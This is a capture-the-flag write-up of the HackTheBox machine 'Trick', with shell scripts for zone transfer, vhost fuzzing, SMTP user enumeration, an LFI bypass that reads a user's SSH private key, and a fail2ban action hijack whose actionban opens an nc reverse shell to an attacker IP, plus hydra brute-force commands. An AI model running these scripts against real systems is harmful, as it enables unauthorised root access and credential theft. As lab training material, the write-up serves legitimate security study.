Trick

Personal Rating: Medium

Enumeration

A full-port nmap scan with service and script detection reveals some interesting details:

sudo nmap -A -p- -v <IP>

Discovered open port 80/tcp on 10.10.11.166
Discovered open port 53/tcp on 10.10.11.166
Discovered open port 22/tcp on 10.10.11.166
Discovered open port 25/tcp on 10.10.11.166

53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian

Host script results:
| dns-blacklist: 
|   PROXY
|     misc.dnsbl.sorbs.net - FAIL
|   SPAM
|     l2.apews.org - FAIL
|_    list.quorum.to - FAIL
|_dns-brute: Can't guess domain of "10.10.11.166"; use dns-brute.domain script argument.

So a DNS server is running on the box!

DNS AXFR Zone Transfer

I found a web server on port 80 but was stuck there right at the beginning. After checking the forum I learned that you had to guess the domain trick.htb. I added it to my hosts file and put the box's IP into my resolv.conf as the DNS server. Then I could perform an AXFR zone transfer for trick.htb with the box as the DNS server, which revealed further hostnames.
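The zone transfer and the hosts-file step, scripted. This is an added example and not code from the original write-up; it assumes the box is 10.10.11.166 and that dig is installed. The A records in a transferred zone often point at loopback or internal addresses, so the helper maps every name to the box's IP instead of trusting the rdata. The zone text at the bottom is a constructed sample shaped like dig's answer section, used only so the block runs offline.

```shell
#!/bin/sh
# Added example (not from the original write-up): pull the trick.htb zone
# from the box's DNS server and turn its A records into /etc/hosts lines.
# Assumed: box IP 10.10.11.166, dig available (bind9-dnsutils / bind-utils).

# Run the zone transfer for a domain against a chosen DNS server.
# Real use:  zone_transfer trick.htb 10.10.11.166
zone_transfer() {
    dig +nocmd +noall +answer axfr "$1" "@$2"
}

# Convert dig's record lines (name ttl class type rdata) into
# "IP<TAB>hostname" lines, A records only, one line per hostname.
# If an IP is given as $1 it replaces the rdata, because zone A records
# frequently say 127.0.0.1 while we need the names to resolve to the box.
axfr_to_hosts() {
    awk -v ip="${1:-}" '
        $3 == "IN" && $4 == "A" {
            sub(/\.$/, "", $1)            # strip trailing dot from owner name
            print (ip != "" ? ip : $5) "\t" $1
        }' | sort -u -k2
}

# Constructed sample in dig's output format (not captured from the box).
SAMPLE_ZONE='trick.htb.                 604800 IN SOA  trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.                 604800 IN NS   trick.htb.
trick.htb.                 604800 IN A    127.0.0.1
trick.htb.                 604800 IN AAAA ::1
preprod-payroll.trick.htb. 604800 IN A    127.0.0.1
root.trick.htb.            604800 IN A    127.0.0.1'

# Offline demo: hosts lines for the sample zone, mapped to the box IP.
hosts_from_sample() {
    printf '%s\n' "$SAMPLE_ZONE" | axfr_to_hosts "${1:-10.10.11.166}"
}

hosts_from_sample
# Against the real box:
#   zone_transfer trick.htb 10.10.11.166 | axfr_to_hosts 10.10.11.166 | sudo tee -a /etc/hosts
```

Note that the AAAA, NS and SOA records are dropped on purpose: only A records name hosts you can reach over IPv4 on the box, which is all the hosts file needs here.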

root.trick.htb appeared to serve the same site as 10.10.11.166:80, while preprod-payroll.trick.htb showed a PHP login page.

Fuzzing the pages I had found revealed some PHP files, though most of them were not of interest.

At users.php I found a supposed administrator with the username Enemigosss.

I started an SSH brute force against that user with hydra, but to no avail.

Once again I had to consult the forum, and learned that a third subdomain had to be found by guessing. I fuzzed virtual hosts of the form preprod-FUZZ.trick.htb and found preprod-marketing.trick.htb.
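The vhost fuzzing step as a small script, added here as an example and not taken from the original write-up. It sends each candidate name in the Host header to the box's IP and reports every candidate whose response size differs from the response for a name that certainly does not exist. It assumes the box is 10.10.11.166 and curl is installed; the wordlist is whatever subdomain list you pass in.

```shell
#!/bin/sh
# Added example (not from the original write-up): brute-force virtual hosts
# of the form preprod-WORD.trick.htb by varying the Host header and comparing
# response sizes against a baseline. Assumed: box IP 10.10.11.166, curl present.

# Size of the response body for one candidate Host header.
# The HTTP status does not matter here; only the length is compared.
probe_size() {
    p_ip=$1
    p_host=$2
    curl -s -o /dev/null -w '%{size_download}' -H "Host: $p_host" "http://$p_ip/"
}

# Print "size vhost" for every candidate whose response differs from the
# baseline. $1 = box IP, $2 = pattern containing WORD, $3 = wordlist file.
vhost_fuzz() {
    ip=$1
    pattern=$2          # e.g. 'preprod-WORD.trick.htb'
    wordlist=$3
    # baseline: a name the server surely has no vhost for
    baseline=$(probe_size "$ip" "$(printf '%s' "$pattern" | sed 's/WORD/doesnotexist/')")
    while IFS= read -r word; do
        [ -n "$word" ] || continue
        vhost=$(printf '%s' "$pattern" | sed "s/WORD/$word/")
        size=$(probe_size "$ip" "$vhost")
        if [ "$size" != "$baseline" ]; then
            printf '%s %s\n' "$size" "$vhost"
        fi
    done < "$wordlist"
}

# Usage against the box (subdomains list assumed to be on your machine):
#   vhost_fuzz 10.10.11.166 'preprod-WORD.trick.htb' subdomains.txt
```

The same comparison is what `ffuf -u http://10.10.11.166 -H 'Host: preprod-FUZZ.trick.htb' -w subdomains.txt -fs <baseline size>` does much faster; the script just makes the filtering logic visible. Comparing sizes rather than status codes matters because a catch-all vhost answers 200 for every unknown name, so only the body length tells a real vhost apart.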

The SMTP port was a rabbit hole, by the way. I could enumerate users by talking to port 25 with telnet, but nothing more came of it. Another option would have been hydra's smtp-enum module.
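The manual telnet session, scripted: an added example that is not part of the original write-up. It issues one VRFY per candidate user in its own connection, so the reply can be matched to the user without parsing a multi-line dialogue, and classifies the reply by SMTP code. It assumes the box is 10.10.11.166, nc is available, and the server greets with a single-line banner (so the VRFY answer is the third line). The reply strings used in the offline part are constructed, not captured from the box.

```shell
#!/bin/sh
# Added example (not from the original write-up): SMTP user enumeration via
# VRFY. Assumed: box IP 10.10.11.166, nc available, single-line banner.

# Classify one VRFY reply line by its code (RFC 5321):
#   250/251/252 -> server accepts the mailbox (252 = "can't verify, will try")
#   550/551/553 -> no such user
classify_vrfy_reply() {
    case $1 in
        250*|251*|252*) echo valid ;;
        550*|551*|553*) echo invalid ;;
        *)              echo unknown ;;
    esac
}

# The exact bytes sent for one user: greeting, the probe, and a clean QUIT.
vrfy_dialogue() {
    printf 'HELO attacker.local\r\nVRFY %s\r\nQUIT\r\n' "$1"
}

# Probe one user on $1 (IP) and print "user verdict".
# Line 1 of the server output is the banner, line 2 the HELO reply,
# line 3 the VRFY reply we care about.
vrfy_user() {
    reply=$(vrfy_dialogue "$2" | nc -w 3 "$1" 25 | sed -n '3p' | tr -d '\r')
    printf '%s %s\n' "$2" "$(classify_vrfy_reply "$reply")"
}

# Walk a user list, one connection per user (slow but unambiguous).
# Usage:  enumerate_users 10.10.11.166 users.txt
enumerate_users() {
    ip=$1
    while IFS= read -r u; do
        [ -n "$u" ] && vrfy_user "$ip" "$u"
    done < "$2"
}
```

If the server answers every VRFY with 252, it is not confirming anything and the 252 carries no information; that is the point at which this port turns into the rabbit hole the write-up describes, and `RCPT TO:` after a `MAIL FROM:` is the next thing to try before moving on.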

Manual SQLi

At http://preprod-marketing.trick.htb/login.php I did some LFI testing and fuzzing but didn't really find anything. The login page was susceptible to SQL injection, though. After some testing I found a working payload.

LFI w/ Filter Bypass

On the authenticated page, an LFI was possible.

A simple filter bypass was necessary. Using the LFI I could then also read the SSH private key of the user michael.
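Why a simple bypass works against a simple filter, as an added example that is not from the original write-up. The write-up does not say which filter the page used, so the one simulated here is an assumed, common one: a single, non-recursive removal of `../` from the parameter (the shell equivalent of PHP's `str_replace('../', '', $page)`). Writing each traversal step as `....//` leaves exactly `../` behind after one pass. The request URL and parameter name at the end are assumptions as well.

```shell
#!/bin/sh
# Added example (not from the original write-up): a non-recursive "../"
# filter and the ....// payload that survives it. The filter is an assumed
# stand-in for whatever the page really did; the URL/parameter are assumed.

# Simulated weak filter: every "../" is deleted once, left to right.
# "....//" contains one "../" (chars 3-5); removing it leaves "../".
weak_filter() {
    printf '%s' "$1" | sed 's#\.\./##g'
}

# After filtering, does the path still climb out of the web root?
escapes_root() {
    case $(weak_filter "$1") in
        *../*) return 0 ;;
        *)     return 1 ;;
    esac
}

# Rewrite a plain traversal payload so each "../" becomes "....//".
bypass_encode() {
    printf '%s' "$1" | sed 's#\.\./#....//#g'
}

# Show the naive payload and the encoded one side by side.
demo() {
    naive='../../../../home/michael/.ssh/id_rsa'
    encoded=$(bypass_encode "$naive")
    printf 'naive:   %s  -> after filter: %s\n' "$naive" "$(weak_filter "$naive")"
    printf 'encoded: %s  -> after filter: %s\n' "$encoded" "$(weak_filter "$encoded")"
}

demo

# Against the box (URL and parameter name are assumptions, adjust to the
# page and parameter you found):
#   LFI_URL='http://preprod-marketing.trick.htb/index.php?page='
#   curl -s "${LFI_URL}$(bypass_encode '../../../../home/michael/.ssh/id_rsa')"
```

The general lesson: any filter that deletes a pattern in one pass is bypassed by nesting the pattern inside itself; the same trick applies to `..\/` or `%2e%2e/` variants depending on what the filter matches, but only `....//` is demonstrated here because it is the one the simulated filter falls to.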

Fail2ban SUID Exploit

sudo -l reveals something of interest.

The id command also showed that the user was a member of the security group. I searched for files owned by that group and found the directory /etc/fail2ban/action.d owned by root:security.

The given permissions allow removing iptables-multiport.conf and replacing it with a custom one that executes /bin/nc ATTACKERIP 4444 -e /bin/bash when someone gets banned. The config file is reset by a cron job every two minutes, and I have to send many requests in a short period to get banned, so I automated both: a bash script on the target and hydra on my machine.
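The target-side half of that automation, as an added example built from what the write-up describes rather than the author's own script. It writes the malicious action file, checks whether the cron reset has undone it, and rewrites it in a loop. It assumes the directory is group-writable while the file itself is root-owned (hence delete-and-recreate instead of editing in place), that fail2ban's sshd jail is what bans the brute-forcer, and that ATTACKER_IP/ATTACKER_PORT point at your listener; ACTION_DIR can be pointed at a scratch directory to dry-run the file generation.

```shell
#!/bin/sh
# Added example (not the write-up's own script): hijack fail2ban's
# iptables-multiport action so the ban command spawns a reverse shell, and
# keep the payload in place across the two-minute cron reset.
# Assumed: /etc/fail2ban/action.d is root:security and group-writable,
# the file inside is root-owned, listener at ATTACKER_IP:ATTACKER_PORT.

ACTION_DIR=${ACTION_DIR:-/etc/fail2ban/action.d}
ATTACKER_IP=${ATTACKER_IP:-10.10.14.2}      # assumed listener address
ATTACKER_PORT=${ATTACKER_PORT:-4444}

# Find what the security group can touch (how the directory was located):
#   find / -group security 2>/dev/null

# Replace the action file. Only actionban is weaponised; the other actions
# are left empty so fail2ban does not fail on a missing definition.
# The original file is root-owned, so it is unlinked (allowed by the
# directory permissions) and recreated rather than edited.
write_action() {
    f="$ACTION_DIR/iptables-multiport.conf"
    rm -f "$f"
    cat > "$f" <<EOF
[Definition]
actionstart =
actionstop =
actioncheck =
actionban = /bin/nc $ATTACKER_IP $ATTACKER_PORT -e /bin/bash
actionunban =
[Init]
EOF
    printf '%s\n' "$f"
}

# Exit 0 while our actionban line is still present (cron has not reset it).
action_is_ours() {
    grep -q "^actionban = /bin/nc $ATTACKER_IP $ATTACKER_PORT" \
        "$ACTION_DIR/iptables-multiport.conf" 2>/dev/null
}

# Re-apply whenever the reset has happened. Run in the background on the
# target:  nohup sh hijack.sh loop 30 >/dev/null 2>&1 &
reapply_loop() {
    interval=${1:-30}
    while :; do
        action_is_ours || write_action >/dev/null
        sleep "$interval"
    done
}

# Attacker side, meanwhile (wordlist path assumed):
#   nc -lvnp 4444
#   hydra -l michael -P /usr/share/wordlists/rockyou.txt -t 10 ssh://10.10.11.166
# enough failed logins to hit the sshd jail's maxretry, then the ban fires
# actionban as root and the shell connects back.

case ${1:-} in
    loop)  reapply_loop "${2:-30}" ;;
    write) write_action ;;
esac
```

The ordering matters: the payload must be in the file before the ban happens, and a ban only runs actionban once per offending IP, so if the reset wins the race you have to wait for the unban (or use a second source IP) before trying again. That is why the loop interval is kept well under the two-minute reset.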

Finding the relevant config file, and working out what it does and under which conditions, was hard for me. I must say I really disliked that you had to guess domains here. But during a real external pentest this might be required and more obvious, so I should expect it next time.
